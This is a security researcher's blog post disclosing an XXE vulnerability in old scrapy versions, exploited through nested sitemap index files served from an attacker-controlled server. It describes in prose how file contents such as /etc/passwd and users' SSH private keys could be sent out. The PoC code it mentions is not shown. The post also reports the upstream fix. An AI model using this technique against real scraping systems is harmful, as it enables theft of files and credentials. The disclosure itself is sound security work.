Exploiting the scraper

Claudio Salazar
Published in
4 min readApr 26, 2019

I’ve made some changes for clarity purposes. Originally it was published in 2014: https://spect.cl/blog/2014/08/exploiting-the-scraper/

As some of you have noticed, the post frequency has been low in last years because I’ve been happily working full-time for more than two years at Scrapinghub, the company behind the popular scrapy framework. I’ve been working mostly on software projects so only in my spare time I dedicate time to do security research.

scrapy is a powerful client-side framework to do web scraping and it usually doesn’t involve server-side components, unless you run scrapyd to manage your scrapy spiders. So I was a bit worried about the security of scrapy because I use it daily and any vulnerability could affect me.

Well, scrapy uses lxml under the hood to do HTML/XML processing and with the XML External Entity (XXE) attacks around, I wanted to test if scrapy was vulnerable to them in some way. Indeed, it was vulnerable as I described in this pull request and in this post I’ll explain to you an automated way to exploit it.

Finding a vulnerable component

I knew that lxml was used at Selectors and some kind of spiders like Sitemap spider. Both components can handle XML files and were vulnerable since they initialized their instance of XMLParser in this way:

lxml.etree.XMLParser(recover=True, remove_comments=True)

According to the documentation, resolve_entities argument is True by default, which makes scrapy vulnerable to the above mentioned XXE attacks.

Before starting the search of vulnerabilities, I’m always thinking about a successful exploitation where I could access/exfiltrate victim data. In this case, Selectors weren't a good spot since:

  1. I should create a malicious XML file.
  2. Serve it in a web server.
  3. A scrapy spider should parse it and the vulnerability would have triggered but I didn't have a way to get that data back to me.

Update 2019: I see that it could be possible to exfiltrate the data with an OOB-XXE, but not sure whether I tried or it worked. Anyway, we’re discarding this option for the remainder of this post.

On the other side, from my experience I had seen that sitemaps sometimes contain nested sitemaps called Sitemap index files and they are requested recursively, so in that way I could keep a flow between a server controlled by me and the victim scrapy spider. That was the chosen path to exploit this vulnerability.

A bit more about sitemaps and Sitemap spider

Sitemaps are files that websites use to index content. Usually they look like this:

A scrapy sitemap spider will request every url in urlset and call a callback, so we can't get the data of a successful attack. However, there are also sitemaps containing index files.

The thing is that a sitemap from a sitemapindex could also contain a sitemapindex , then the spider continue requesting to our server as long as we want. That way we can keep a flow with the victim spider and every request is a chance to exfiltrate data.

Exploiting the vulnerability in a automated way

To exploit this vulnerability we need a victim using the Sitemap spider. An example of this would be this simple spider:

On the server side, the steps are:

  • Create a server listening on port 5000 (according tositemap_urls attribute in the spider)
  • Create a malicious XML file as explained below:

We can set file_path to any file we want to read and our file contains a nested sitemap with the payload to trigger the vulnerability.

  • As you see from our malicious file, the next sitemap will be requested and in its path it will contain the contents of file_path. Now we have a way to get retrieve the data from the victim.
  • Do we want only a file? No. We can answer the last request with our malicious file and request more files.

Things get interesting when in the first response you put a payload to read /etc/passwd, receive the contents, recreate the list of real users (not system users) and in the next response you could read /home/%user/.ssh/id_rsa and bingo!

Two things to consider but that are fully implemented in the PoC: the sitemap loc needs to end in .xml and frameworks like Bottle or Flask couldn't handle the weird requests containing /etc/passwd contents so I had to use the built-in HTTPserver.

The malicious server code is pasted below. It’s just a PoC.

And a video showing the exploitation is here. It reads the local file flag.txt of the victim.


The pull request fixing the vulnerability was discussed with the scrapy dev team and in few days it was merged into master. It’s always good to resolve security issues quickly.

I want to clarify that only versions <= 0.21 were vulnerable to this vulnerability. Even in Ubuntu repositories there are many patched versions available. After this, we agree on opening a security mailing list to address this kind of bugs, which is a good initiative and I expect to continue contributing to it.